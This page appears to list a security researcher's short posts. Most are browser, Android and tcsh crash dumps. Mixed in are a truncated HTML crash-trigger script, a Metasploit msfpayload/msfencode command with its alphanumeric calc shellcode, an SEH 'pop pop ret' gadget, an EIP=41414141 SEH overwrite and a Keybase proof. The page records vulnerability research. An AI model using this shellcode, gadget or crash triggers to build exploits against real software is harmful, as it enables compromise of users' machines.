h0wl

(c14.12b0): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SYSTEM32\ntdll.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\jscript9.dll - 
eax=0dcede18 ebx=1762ef78 ecx=0dcede88 edx=1767cff0 esi=1759e980 edi=1759e980
eip=6a291314 esp=0b0dc5a8 ebp=0b0dc5d0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
jscript9!DllCanUnloadNow+0xb5d24:
6a291314 8b4a04          mov     ecx,dword ptr [edx+4] ds:002b:1767cff4=????????
0:006> .symfix
0:006> .reload

h0wl

(4684.4fcc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0e2b6f84 ecx=00000000 edx=0a8e7fb8 esi=00000000 edi=0e2b6e98
eip=5f302e86 esp=0a84b074 ebp=0a84b098 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
0:017> .symfix
0:017> .reload
Reloading current modules
................................................................

h0wl

<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
        var divA = document.createElement("div");
        document.body.appendChild(divA);

        try {
                //divA.contentEditable = "true";

h0wl

Logcat output:
F/libc    ( 7647): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x53a686f4 in t
id 7647 (sh)
I/DEBUG   ( 1468): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *
**
I/DEBUG   ( 1468): Build fingerprint: 'google/occam/mako:5.0.1/LRX22C/1602158:us
er/release-keys'
I/DEBUG   ( 1468): Revision: '11'
I/DEBUG   ( 1468): ABI: 'arm'
I/DEBUG   ( 1468): pid: 7647, tid: 7647, name: sh  >>> /system/bin/sh <<<

h0wl

Program received signal SIGSEGV, Segmentation fault.
0x080d827a in xputchar (c=8388738) at sh.print.c:156
156   if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {
(gdb) x/i $eip
=> 0x80d827a <xputchar+234>:  movzwl (%eax,%ebx,2),%edx

h0wl

Keybase proof

I hereby claim:

• I am h0wl on github.
• I am howl (https://keybase.io/howl) on keybase.
• I have a public key whose fingerprint is 0B86 93C8 A01C 9815 1500 BEDE C8A8 39DC 71FE CD63

To claim this, I am signing this object:

h0wl

root@kali:~# msfpayload windows/exec CMD=calc R | msfencode BufferRegister=ESP -e x86/alpha_upper -t raw
[*] x86/alpha_upper succeeded with size 453 (iteration=1)

TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHLIS0C030CPK9ZEP1YBBDLKV26PLK62TLLKF2EDLKSB6HTOH7PJVFP1KOVQYPNLGLU13LERFL10YQXOTM318GZBJP1B1GLKF24PLK72WL5QN0LK70T8LEO0441ZUQ8PF0LK1XB8LKQHGP5Q8SM37LPILK6TLK5Q8V01KO01O0NLIQHO4MEQO77HKPBUKDS3CMZXGKSMVD45JB0XLKF81431YCU6LK4LPKLKV85LC1HSLKUTLKC18PK974147T1KQKE11I1J61KOM0V81O1JLK22JKLFQM2JC1LMLEX9UP30S060BHFQLKBOMWKOXUOKL0NUNBV63XNFLUOMMMKOIEWL5VSL5ZK0KKKP2UTEOK775C2RROCZ5P63KO9ESSE12LSSUPAA

h0wl

0x64743851 : pop edi # pop ebp # ret  | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [libpng15-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (D:\Program Files (x86)\Hopper Disassembler\libpng15-15.dll)

h0wl

Windows 7:
(1fc4.2034): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7737b4ad esi=00000000 edi=00000000
eip=41414141 esp=00091370 ebp=00091390 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
41414141 ??              ???
0:000> !exchain
00091384: ntdll!ExecuteHandler2+3a (7737b4ad)
[...]
00284ce0: ntdll!ExecuteHandler2+3a (7737b4ad)

h0wl

<div onload=#>